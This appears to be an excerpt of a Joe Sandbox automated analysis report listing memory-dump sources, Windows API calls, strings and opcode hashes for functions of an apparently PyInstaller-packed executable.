                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __acrt_iob_func$fflushfprintf$clock$memmove
                                                                                                                                                                                                            • String ID: %79s$%u%% $Breaking content into %u epochs of size %u
                                                                                                                                                                                                            • API String ID: 2530940919-3933756482
                                                                                                                                                                                                            • Opcode ID: 2728414b86fa5267f45f2b77d7c4a36c8525615e958aa62ecc3d87ac4f66b0bd
                                                                                                                                                                                                            • Instruction ID: aca8101ec1e2b3288f88e421390e0824e186e97799bb110fd12c9915125a0429
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2728414b86fa5267f45f2b77d7c4a36c8525615e958aa62ecc3d87ac4f66b0bd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4871D232B09A8296EB24CF29E4547A9B3A1FB887C4F014035DA4D53B95EF3CE455C718
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: exit$memset
                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                            • API String ID: 2031340617-2766056989
                                                                                                                                                                                                            • Opcode ID: d935e166079703ec2d935024c80c0d5208d74c246817078dbccdbbe468a93c6b
                                                                                                                                                                                                            • Instruction ID: 4744c7138ba99bc26cd3d89dd2f6de3b29cccc436ba89bf4b90403c1cea13d2d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d935e166079703ec2d935024c80c0d5208d74c246817078dbccdbbe468a93c6b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60225732A05B8596EB628F29E4497EAB7A4FF487C8F048225EF8D17758EF38D145C704
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,-00000018,?,00007FF8A7FF3723), ref: 00007FF8A7FF3CA1
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,-00000018,?,00007FF8A7FF3723), ref: 00007FF8A7FF3D46
                                                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,-00000018,?,00007FF8A7FF3723), ref: 00007FF8A7FF3D64
                                                                                                                                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,-00000018,?,00007FF8A7FF3723), ref: 00007FF8A7FF3DD9
                                                                                                                                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,-00000018,?,00007FF8A7FF3723), ref: 00007FF8A7FF3E05
                                                                                                                                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,-00000018,?,00007FF8A7FF3723), ref: 00007FF8A7FF3E2B
                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,-00000018,?,00007FF8A7FF3723), ref: 00007FF8A7FF3ED6
                                                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,-00000018,?,00007FF8A7FF3723), ref: 00007FF8A7FF3EF7
                                                                                                                                                                                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,-00000018,?,00007FF8A7FF3723), ref: 00007FF8A7FF3FBC
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: realloc$calloc$malloc
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2035205612-0
                                                                                                                                                                                                            • Opcode ID: 087b4d92c9e7e93921cc366f1cc971ff3438d2567117a54d96d7f278db711162
                                                                                                                                                                                                            • Instruction ID: 55465a3814309dc574be5843712232f45999a6cc653fdb2074c8bebe6b52e550
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 087b4d92c9e7e93921cc366f1cc971ff3438d2567117a54d96d7f278db711162
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10B17B32716B4AA6EF588F25E45023D73A4FB48B94F045639DE5E53B88DF78E562C300
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: realloc$calloc$malloc
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2035205612-0
                                                                                                                                                                                                            • Opcode ID: d7f7bb80c56b5d9c708f521a3b7fde20287332d84eaf463f03a6e1def7f2d16d
                                                                                                                                                                                                            • Instruction ID: 2b3170b4986bc3bddc3959f554c01dfa23ea6201de9729fb84bffdad82785f8f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7f7bb80c56b5d9c708f521a3b7fde20287332d84eaf463f03a6e1def7f2d16d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0B14722716B4A97EE64CF66A84532973A0FB48B94F485639CFAE53780DF7CE161C300
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                            • Opcode ID: e520d116f7293a8a270f7d40ac50cfd797ff5e1af0e1af78d5752c8ba321e0ac
                                                                                                                                                                                                            • Instruction ID: 9874195b19f931642b2948c418bcb67133d8b5ed1a2e4c95dbfbb5325ab004ce
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e520d116f7293a8a270f7d40ac50cfd797ff5e1af0e1af78d5752c8ba321e0ac
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20315A7260AB819AEB608F70E8403ED7360FB94788F44403ADA4E47B98EF7CD658C754
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285221052.00007FF8A7E71000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF8A7E70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285204631.00007FF8A7E70000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285237784.00007FF8A7E73000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285254997.00007FF8A7E74000.00000004.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285271778.00007FF8A7E75000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7e70000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                            • Opcode ID: 15ab57132a56a43adcf6d314196c4535093efc661be566aed9b6740bd42d3de9
                                                                                                                                                                                                            • Instruction ID: d316ae8715480369b76373a76b5c272e5c93bd83e8c74ca4b617154273d22ca4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15ab57132a56a43adcf6d314196c4535093efc661be566aed9b6740bd42d3de9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C431927260ABC199EB608F64E8403ED7365FB84B88F44443ADA4D57B94EF3CD658D710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285379193.00007FF8A7E91000.00000020.00000001.01000000.00000039.sdmp, Offset: 00007FF8A7E90000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285360814.00007FF8A7E90000.00000002.00000001.01000000.00000039.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285396806.00007FF8A7E94000.00000002.00000001.01000000.00000039.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285413947.00007FF8A7E95000.00000004.00000001.01000000.00000039.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285430029.00007FF8A7E96000.00000002.00000001.01000000.00000039.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7e90000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 313767242-0
                                                                                                                                                                                                            • Opcode ID: 8cd5be0b42e6e7f0319df2977d08f00477f2cc742b936249396d47c5008990bc
                                                                                                                                                                                                            • Instruction ID: 27a8ae6056dc9a47cda1709664ae81708c38234ae41a837990415bee19c3e142
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8cd5be0b42e6e7f0319df2977d08f00477f2cc742b936249396d47c5008990bc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94314173609E8195EB608FA4E8507EEB3A1FB45B88F44403ADA4D47B94DF3CD658D710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTempPathW.KERNEL32(?,00000000,?,00007FF7ACE8672D), ref: 00007FF7ACE867FA
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE86970: GetEnvironmentVariableW.KERNEL32(00007FF7ACE836C7), ref: 00007FF7ACE869AA
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE86970: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7ACE869C7
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE965E4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACE965FD
                                                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF7ACE868B1
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82770: MessageBoxW.USER32 ref: 00007FF7ACE82841
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                                                                            • API String ID: 3752271684-1116378104
                                                                                                                                                                                                            • Opcode ID: 4828d69836246918269f07bf884f0db2084dfee84ed506a5a3d02a588ff47569
                                                                                                                                                                                                            • Instruction ID: 10888fb71a76abedbea3f54483dca49de9895716b1a06f1e90fd6b8427e96a6c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4828d69836246918269f07bf884f0db2084dfee84ed506a5a3d02a588ff47569
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A51C235B0F68374FE54B7269A162BAE2559F44BC1FC65031EC0E6B7B6EE2CE4018720
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
• Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2221118986-0
                                                                                                                                                                                                            • Opcode ID: 514c606d78c05e2b4ea6996c4e008d1419102a49b6ef7a30e12193a32fc8e760
                                                                                                                                                                                                            • Instruction ID: f9bc61dc9d8452a98c9b45d105302d74e994a904678ae6e7310608fdaacfe565
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 514c606d78c05e2b4ea6996c4e008d1419102a49b6ef7a30e12193a32fc8e760
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BC12821E0AE8595E6538B3490413B9A365FF657D4F158332E54F32640EF3CF4A3CA28
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
• Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                            • Opcode ID: fbdfe3cbec041ac85cd1f64ea4b15fcfe09a87be1aa09ac25d8a719fe1a921a3
                                                                                                                                                                                                            • Instruction ID: 5cdc8236ba3edd1a04c0d69f64c4cd58851fee1a70d465b1c8bdee2caf4207c1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fbdfe3cbec041ac85cd1f64ea4b15fcfe09a87be1aa09ac25d8a719fe1a921a3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4031727360DB8199EB609F60E8803EDB361FB44745F854039DA4E67BA8DF38D548CB20
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
• Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                                            • Opcode ID: e7141d2691e6fffc336151182819a094942dc067ac16da689744b042d81b35af
                                                                                                                                                                                                            • Instruction ID: 524421e0cbc9ec56c27415ba1cb9c979d7c052f119fd1ead870d0783ffa5ae5e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7141d2691e6fffc336151182819a094942dc067ac16da689744b042d81b35af
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6231B43361DB81A6EB60DF24E8402AEB3A0FB88755F850135EA8D53BA4DF3CC555CB10
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
• Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
• Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memmove$memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3790616698-0
                                                                                                                                                                                                            • Opcode ID: d38339a1fa69ae93e881e34f82764f7fb8b25ad2ebc99717183724d7faf9ce3a
                                                                                                                                                                                                            • Instruction ID: 8212cae5b616699ff12ce979cdb312046166c7d84bec3b2e29fbea83f16fc1f9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d38339a1fa69ae93e881e34f82764f7fb8b25ad2ebc99717183724d7faf9ce3a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50E12732E0EA8295EF64EA25A5043B96661FB41BE4F484331DE5D277C9CF3CE560C329
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
• Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: d986cd0ab5317f4a3b1b976a0db30a1a9a1ca54cf71bc41686f59a844fc28997
                                                                                                                                                                                                            • Instruction ID: a27f7351eee5ffbc99974ec096bba651336192f950c9e86c05f20e6d5e2b7935
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d986cd0ab5317f4a3b1b976a0db30a1a9a1ca54cf71bc41686f59a844fc28997
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28E10731A19E859AE71B8B34D040379B365FFA97C4F549332E68F22754EF3CA482CA54
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
• Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 8d7cb500461f40d2d6a52e866c58501b6e73d209b4066772ae3d5bb95b1305d4
                                                                                                                                                                                                            • Instruction ID: f268497dc374b5ff793e9035834acc9b5f8f1acff9bbcfc3e869bc5c0cca0d4c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d7cb500461f40d2d6a52e866c58501b6e73d209b4066772ae3d5bb95b1305d4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9AE12931A19F818AE71B8B38E101779A395FFA97C4F145732D64F62754EF3CA482CA14
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
• Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2227656907-0
                                                                                                                                                                                                            • Opcode ID: 15b37066209686d126a4855257e5fe5093a8358f256cf270ac53eceea75e82af
                                                                                                                                                                                                            • Instruction ID: c9f3e98de7364faefdf41d73c3130f2a03373d05b88e5e864d0b95272ff02b72
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15b37066209686d126a4855257e5fe5093a8358f256cf270ac53eceea75e82af
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4B1B632B1E6826DEA61AB2195002B9E390EF44BD5F8A5131ED5E27BE5DF3CE441C310
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
• Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmp
• Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: log2$memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3759962277-0
                                                                                                                                                                                                            • Opcode ID: d7c82d7eb5ed4bbf6f45e46b1924f1e12311d618bba5931698bcaf2d9eae93d8
                                                                                                                                                                                                            • Instruction ID: d2180dff0526a4f05fe63036b7215546a9f47c0fd6e712919efa7b55d8c3dc31
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7c82d7eb5ed4bbf6f45e46b1924f1e12311d618bba5931698bcaf2d9eae93d8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA513721E1AE8559E6138B349041375E365EF757D4F19C336DA4F32A01FF2DA493CA28
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285379193.00007FF8A7E91000.00000020.00000001.01000000.00000039.sdmp, Offset: 00007FF8A7E90000, based on PE: true
• Associated: 00000002.00000002.3285360814.00007FF8A7E90000.00000002.00000001.01000000.00000039.sdmp
• Associated: 00000002.00000002.3285396806.00007FF8A7E94000.00000002.00000001.01000000.00000039.sdmp
